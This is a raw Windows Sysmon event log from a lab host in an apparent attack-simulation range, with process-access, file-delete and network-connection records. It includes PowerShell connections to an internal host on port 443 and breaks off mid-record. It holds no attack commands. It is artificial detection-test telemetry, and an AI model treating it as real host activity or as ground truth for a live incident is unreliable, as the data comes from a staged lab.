10341000x800000000000000035343515Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:18.310{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343514Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:18.310{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343513Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:18.310{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343512Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:18.310{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343511Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:18.310{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343510Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:18.310{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343509Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:18.310{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343508Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:18.310{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343507Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:18.310{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343506Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:18.310{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035343505Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:18.279{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BC615A3208EB1E6B6D4E5C9682D8B655,SHA256=4732BDF97D7759693B11338503BAC9BA771D6C952F070B0CBF8968E9C35233F6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343504Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:18.279{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A3CE9A4CAD4E552A27AC829803EDE7FE,SHA256=5E031C051B14149192F721CA962821EDFE869DB48F5F5ADE0AA18DD6792F51B5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035343503Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:18.132{B81B27B7-742D-613B-5DB4-03000000C801}36046712C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035343502Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:18.032{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65B0B922064CF7F2596752209835603A,SHA256=9246C9331F6A593D36EF7E130DF7F0FB60F7EACAD590E0D8EC67CF0A10975C8B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343536Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:19.094{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17A8DEC52B096897BFC9E60331E40666,SHA256=833101B8A76A61792F45BE4DDF1018B0605F13AF4FB2BCF19BDC280590F2A85C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035343535Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:18.310{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035343537Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:20.128{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA90E57E59E98DFEE34836B2F9FD17C8,SHA256=BEFE0286096F88EC24C039D3F6522A3FB86CA1ADA29CA95B0C5B5ACA66A73B8B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343538Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:21.147{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=313827E682A1E58043733002283B70EB,SHA256=39BBF0CD083072A6E02DD60BAE6D6189E875A9CB263699CF3B53E279B4A90DA9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343541Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:48.252{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52564-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343540Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:22.365{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=8C41CF2898340A9E75F8A5544FD2B6FD,SHA256=CAB4B658001CFB1640D856C0536957AC55FB62A194AAEFA484DDA951ADEC0B50,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343539Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:22.365{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DCC6D952B8ED4ADB557F241F747B6DD,SHA256=35FF4FB2C4674EF0A7F511D29D4DC1BA58001FB162113621D5A89740F5A2944E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343544Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:49.081{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52565-false10.0.1.12-8000- 23542300x800000000000000035343543Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:23.366{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A1888C1CD4E6C1E8059CDAC0BD6B0AE,SHA256=C84978EAD2F09570297C5FBF3026D08BB6F55B3EA1F220EC40E0C8B74A67DBDF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343542Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:23.178{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343545Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:24.382{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB2F8995B4261D06D625F43EE5D6438E,SHA256=F9A329FB21CB45A64D7A0854F81638B1EE38FA1D5F05BC3C4180CEF4F15EC3CF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343547Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:50.168{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52566-false10.0.1.12-8089- 23542300x800000000000000035343546Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:25.396{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B8EF1E60368F13FA9249631BD52A8EA,SHA256=6BE24FC1EDE613B23EDF3CA0A4EF9313768F145547B4374366622C3E0C281E0B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343548Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:26.429{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D830D2D165D61C8ADD2497D18C7E2C6A,SHA256=D4CF9502273621E116F312BEB69D037DD07741C8791B30E309B0AD36E302F3D7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343550Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:27.464{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=266DCBE965A36EAC349B00E42ACE44C0,SHA256=9C58A26FE8939305E48A5F54B902487AC6F372EF32AD0870BF4F5B63A44D3F9E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343549Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:27.333{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3F06FB255AC0AA86B6C3444A4D8D23EF,SHA256=9F7FC55A581C9294ED7B1EBF11056FCFFFDAFA45812CF2178F42EBF5B1DA6159,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343552Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:53.255{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52567-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343551Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:28.479{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B01989E2C22ABC83C694E549B9A3082,SHA256=A1901C05005FE0030AE72542EA0A7886AA785E54B786AF89FA1A2274DA48A0E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343554Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:55.069{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52568-false10.0.1.12-8000- 23542300x800000000000000035343553Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:29.494{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B830FFD5E81CE459B0202F463848DBF3,SHA256=7A9515CD3E8484083251CDC2B85EA446A59EE5C7D405DEB1CCB5E63C62259942,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343555Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:30.527{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D8ABE6233E37D4641B5FB0CFB871F78,SHA256=2541294C8D4EED12070A817789CC3801853D5FC40890C2CA9A64087B09912105,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035343574Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:31.980{B81B27B7-743B-613B-5FB4-03000000C801}4082408C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343573Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:31.796{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-743B-613B-5FB4-03000000C801}408C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343572Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:31.796{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343571Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:31.796{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343570Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:31.796{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343569Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 